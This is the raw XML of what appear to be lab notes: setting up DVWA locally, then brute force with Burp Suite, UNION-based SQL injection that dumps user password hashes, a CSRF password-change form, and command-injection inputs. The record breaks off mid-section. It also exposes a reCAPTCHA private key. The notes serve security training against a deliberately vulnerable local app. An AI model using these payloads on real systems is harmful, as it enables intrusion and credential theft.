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4A" w:rsidRPr="00955D4A" w:rsidRDefault="00955D4A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00955D4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setup DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E77D5" w:rsidRDefault="002E77D5">
      <w:r>
        <w:t>Download DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F00EB" w:rsidRDefault="00BA673C">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="009A1DD8" w:rsidRPr="00A972DB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/digininja/DVWA</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009A1DD8" w:rsidRDefault="009A1DD8">
      <w:r>
        <w:t xml:space="preserve">now extract </w:t>
      </w:r>
      <w:r w:rsidRPr="009A1DD8">
        <w:t>DVWA-master</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.zip file and rename it to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009A1DD8" w:rsidRDefault="009A1DD8">
      <w:r>
        <w:t xml:space="preserve">copy that folder to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htdocs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009A1DD8" w:rsidRDefault="009D318D">
      <w:r>
        <w:t xml:space="preserve">now open </w:t>
      </w:r>
      <w:r w:rsidRPr="009D318D">
        <w:t>C:\xampp\htdocs\dvwa\DVWA-master\config</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>remove .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>extention</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>config.inc.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D318D" w:rsidRDefault="009D318D">
      <w:r>
        <w:t>open that file and change following</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D318D" w:rsidRDefault="009D318D" w:rsidP="009D318D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db_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' ]     = 'root';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D318D" w:rsidRDefault="009D318D" w:rsidP="009D318D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db_password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' ] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D318D" w:rsidRDefault="009D318D" w:rsidP="009D318D">
      <w:r>
        <w:t>Now save that file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D318D" w:rsidRDefault="009D318D" w:rsidP="009D318D">
      <w:r>
        <w:t xml:space="preserve">Now open chrome: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00A972DB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1/dvwa/dvwa-master/setup.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D318D" w:rsidRDefault="009D318D" w:rsidP="009D318D">
      <w:r>
        <w:t>Click on create/reset database at the end, click on login, enter admin as user and password as password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D318D" w:rsidRDefault="00023588" w:rsidP="009D318D">
      <w:r>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00A972DB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1/dvwa/dvwa-master/setup.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> page </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allow_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is disabled so stop apache and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00023588" w:rsidRDefault="00023588" w:rsidP="009D318D">
      <w:r>
        <w:t xml:space="preserve">Right click on apache control panel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> button and open php.ini file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00023588" w:rsidRDefault="00023588" w:rsidP="009D318D">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allow_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and change it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00930429" w:rsidRPr="00930429">
        <w:t>allow_url_include</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00930429" w:rsidRPr="00930429">
        <w:t>=On</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00020681" w:rsidRDefault="00020681" w:rsidP="009D318D">
      <w:r>
        <w:t xml:space="preserve">Now restart apache and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referesh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00A972DB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1/dvwa/dvwa-master/setup.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AB1D97" w:rsidRDefault="00AB1D97" w:rsidP="009D318D">
      <w:r>
        <w:t>Click on insecure captcha from left menu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1D97" w:rsidRDefault="00AB1D97" w:rsidP="009D318D">
      <w:r>
        <w:t xml:space="preserve">Click on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Please register for a key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8FAFA"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8FAFA"/>
        </w:rPr>
        <w:t>reCAPTCHA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8FAFA"/>
        </w:rPr>
        <w:t>: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99CC33"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://www.google.com/recaptcha/admin/create</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00275183" w:rsidRDefault="00275183" w:rsidP="009D318D">
      <w:r>
        <w:t>Fill this form</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00275183" w:rsidRDefault="00275183" w:rsidP="009D318D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D80177E" wp14:editId="3C20C376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83" w:rsidRDefault="00275183" w:rsidP="009D318D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A202B72" wp14:editId="7E6115B6">
            <wp:extent cx="55435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F2" w:rsidRDefault="008A04F2" w:rsidP="009D318D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="637ABE05" wp14:editId="71436CC0">
            <wp:extent cx="44958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5" w:rsidRDefault="00AF72E5" w:rsidP="009D318D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="121336E2" wp14:editId="4ADD009F">
            <wp:extent cx="4886325" cy="26356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129" cy="26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5" w:rsidRDefault="00AF72E5" w:rsidP="009D318D">
      <w:r>
        <w:t xml:space="preserve">Copy this code into </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF72E5">
        <w:t>C:\xampp\htdocs\dvwa\DVWA-master\config</w:t>
      </w:r>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF72E5">
        <w:t>config.inc</w:t>
      </w:r>
      <w:r>
        <w:t>.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF72E5" w:rsidRDefault="00AF72E5" w:rsidP="00AF72E5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recaptcha_public_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' ]  = '6Lf6Q_UhAAAAABN-dlB6PhXZ77CQ8S1fJgljQD12';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF72E5" w:rsidRDefault="00AF72E5" w:rsidP="00AF72E5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recaptcha_private_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' ] = '6Lf6Q_UhAAAAAErVefpyVpjOBFJkwBypDGziQHlq';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7331E" w:rsidRDefault="005446A5" w:rsidP="009D318D">
      <w:r>
        <w:t xml:space="preserve">Now click on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> security -&gt; change the security level to low and submit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7331E" w:rsidRDefault="00E7331E">
      <w:r w:rsidRPr="001E4C30">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Brute force attack</w:t>
      </w:r>
      <w:r w:rsidR="00801770">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00DB0998" w:rsidRPr="00DB0998">
        <w:t>https://www.youtube.com/watch?v=bmphk1QbkOM&amp;list=PLZUQcQP4Xtlp64Q6tzw8GdLsOweBsKDSs&amp;index=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7331E" w:rsidRDefault="00E7331E">
      <w:r>
        <w:t>First download burp suit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7331E" w:rsidRDefault="00E7331E">
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00714697">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/burp/releases/professional-community-2022-8-4?requestededition=community&amp;requestedplatform</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E7331E">
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290F0B" w:rsidRDefault="00290F0B">
      <w:r>
        <w:t>change google chrome proxy settings to 127.0.0.1 and port to 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290F0B" w:rsidRDefault="00290F0B">
      <w:r>
        <w:t xml:space="preserve">then in burp suit set intercept, click intercept on and then open browser and open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from there</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D17DF" w:rsidRDefault="00290F0B">
      <w:r>
        <w:t xml:space="preserve">open brute force in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008D17DF" w:rsidRDefault="008D17DF">
      <w:r w:rsidRPr="008D17DF">
        <w:t>http://127.0.0.1/dvwa/dvwa-master/vulnerabilities/brute/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290F0B" w:rsidRDefault="00290F0B">
      <w:r>
        <w:t xml:space="preserve"> insert wrong password it will be intercepted in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> suit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00661BF1" w:rsidRDefault="00661BF1">
      <w:r>
        <w:t xml:space="preserve">now on action, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>select  send</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to intruder and set intercept off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC5282" w:rsidRDefault="00DC5282">
      <w:r>
        <w:t xml:space="preserve">now select attack </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>type :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cluster bomb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC5282" w:rsidRDefault="00DC5282">
      <w:r>
        <w:t>and add $ sign before and after username and password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E4C30" w:rsidRDefault="001E4C30"/>
    <w:p w:rsidR="001E4C30" w:rsidRDefault="004651DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB60DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003859BE" w:rsidRDefault="003859BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Check no of columns in table, first check 1 then 2 then 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB60DC" w:rsidRPr="003859BE" w:rsidRDefault="00EB60DC" w:rsidP="003859BE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3859B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?id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003859B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=1' order by 1,2--+ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003859BE" w:rsidRPr="003859BE" w:rsidRDefault="003859BE" w:rsidP="003859BE">
      <w:pPr>
        <w:pStyle w:val="ListParagrap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EB60DC" w:rsidRPr="003859BE" w:rsidRDefault="00EB60DC" w:rsidP="003859BE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3859B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?id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003859B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=1' union select 1,2--+ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003859BE" w:rsidRPr="000F6590" w:rsidRDefault="003859BE" w:rsidP="003859BE">
      <w:pPr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F6590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Check database name and version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB60DC" w:rsidRPr="00B3165C" w:rsidRDefault="00EB60DC" w:rsidP="00B3165C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B3165C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?id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B3165C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=1' union select database(),version()--+ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3165C" w:rsidRPr="00E246BD" w:rsidRDefault="00B3165C" w:rsidP="00B3165C">
      <w:pPr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246BD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Get table names</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB60DC" w:rsidRPr="00DE6323" w:rsidRDefault="00EB60DC" w:rsidP="00DE6323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DE632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?id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DE632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=1' union select 1,table_name from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE632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information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE632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--+ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE6323" w:rsidRDefault="00DE6323" w:rsidP="00DE6323">
      <w:pPr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DE6323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Get columns of users table</w:t>
      </w:r>
      <w:r w:rsidR="001B543A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, users can not be directly typed so convert users table name first into decimal using</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B543A" w:rsidRPr="00DE6323" w:rsidRDefault="001B543A" w:rsidP="00DE6323">
      <w:pPr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Text to Decimal Converter - </w:t>
      </w:r>
      <w:hyperlink r:id="rId1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https://goo.gl/MZnCcx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EB60DC" w:rsidRPr="00F2117D" w:rsidRDefault="00EB60DC" w:rsidP="00F2117D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F2117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?id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F2117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=1' union select 1,column_name from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F2117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information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F2117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where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F2117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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F2117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=char(117,115,101,114,115)--+ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2117D" w:rsidRPr="00F2117D" w:rsidRDefault="00F2117D" w:rsidP="00F2117D">
      <w:pPr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F2117D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Get only two columns user and password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB60DC" w:rsidRPr="00DC1D88" w:rsidRDefault="00EB60DC" w:rsidP="00DC1D88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DC1D8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?id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC1D8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=1' union select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC1D8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user,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC1D8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from users--+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC1D88" w:rsidRDefault="00DC1D88" w:rsidP="00DC1D88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It returns passwords in encrypted form so decrypt it using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http://goo.gl/YnnpTd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DC1D88" w:rsidRPr="00DC1D88" w:rsidRDefault="00DC1D88" w:rsidP="00DC1D8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t xml:space="preserve">(Md5 online </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decrypter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB60DC" w:rsidRDefault="00EB60D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---------------------------------------------------------------------------------------- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB60DC" w:rsidRDefault="00EB60D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Text to Decimal Converter - </w:t>
      </w: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https://goo.gl/MZnCcx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B60DC" w:rsidRPr="00EB60DC" w:rsidRDefault="00EB60DC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs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MD5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Decrypter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hyperlink r:id="rId1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http://goo.gl/YnnpTd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004651DD" w:rsidRDefault="004651DD"/>
    <w:p w:rsidR="00801770" w:rsidRPr="00EB06A1" w:rsidRDefault="00EB06A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB06A1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CSRF Attack using DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB06A1" w:rsidRDefault="00BF2CD0">
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00714697">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=y5beFVL-cME&amp;list=PLZUQcQP4Xtlp64Q6tzw8GdLsOweBsKDSs&amp;index=4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BF2CD0" w:rsidRDefault="002610A6">
      <w:r>
        <w:t xml:space="preserve">open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> set security to low</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002610A6" w:rsidRDefault="002610A6">
      <w:r>
        <w:t xml:space="preserve">click </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, then view page source and copy form tag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB36C5" w:rsidRDefault="00BB36C5" w:rsidP="00BB36C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;form action="http://localhost/dvwa/dvwa-master/vulnerabilities/csrf/?" method="GET"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB36C5" w:rsidRDefault="00BB36C5" w:rsidP="00BB36C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>click below button to get $50000:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB36C5" w:rsidRDefault="00BB36C5" w:rsidP="00BB36C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;input type="hidden" AUTOCOMPLETE="off" name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>password_new</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" value="456"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB36C5" w:rsidRDefault="00BB36C5" w:rsidP="00BB36C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;input type="hidden" AUTOCOMPLETE="off" name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>password_conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" value="456"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB36C5" w:rsidRDefault="00BB36C5" w:rsidP="00BB36C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;input type="submit" value="Change" name="Change"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB36C5" w:rsidRDefault="00BB36C5" w:rsidP="00BB36C5"/>
    <w:p w:rsidR="002610A6" w:rsidRDefault="00BB36C5" w:rsidP="00BB36C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB36C5" w:rsidRDefault="00BB36C5" w:rsidP="00BB36C5"/>
    <w:p w:rsidR="00BB36C5" w:rsidRDefault="00BB36C5" w:rsidP="00BB36C5">
      <w:r>
        <w:t xml:space="preserve">Save this file as test.html, run it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will change the password of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB36C5" w:rsidRDefault="009774A7" w:rsidP="00BB36C5">
      <w:r>
        <w:t>This is how third party can intercept and find out the credential.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F3E35" w:rsidRDefault="000F3E35" w:rsidP="00BB36C5"/>
    <w:p w:rsidR="000F3E35" w:rsidRDefault="000F3E35" w:rsidP="00BB36C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F3E35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00141B39" w:rsidRDefault="00141B39" w:rsidP="00BB36C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00141B39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://www.youtube.com/watch?v=iu3nbkATU9k&amp;list=PLZUQcQP4Xtlp64Q6tzw8GdLsOweBsKDSs&amp;index=3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00141B39" w:rsidRPr="00141B39" w:rsidRDefault="00141B39" w:rsidP="00BB36C5">
      <w:r w:rsidRPr="00141B39">
        <w:t>Open command injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290F0B" w:rsidRDefault="00141B39">
      <w:r>
        <w:t xml:space="preserve">Type local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: 127.0.0.1 it will </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shows</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reply from this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00141B39" w:rsidRDefault="00141B39">
      <w:r>
        <w:t xml:space="preserve">Now type 127.0.0.1 &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, it will list directories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00141B39" w:rsidRDefault="00141B39">
      <w:r>
        <w:t xml:space="preserve">127.0.0.1 &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>c:\ ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
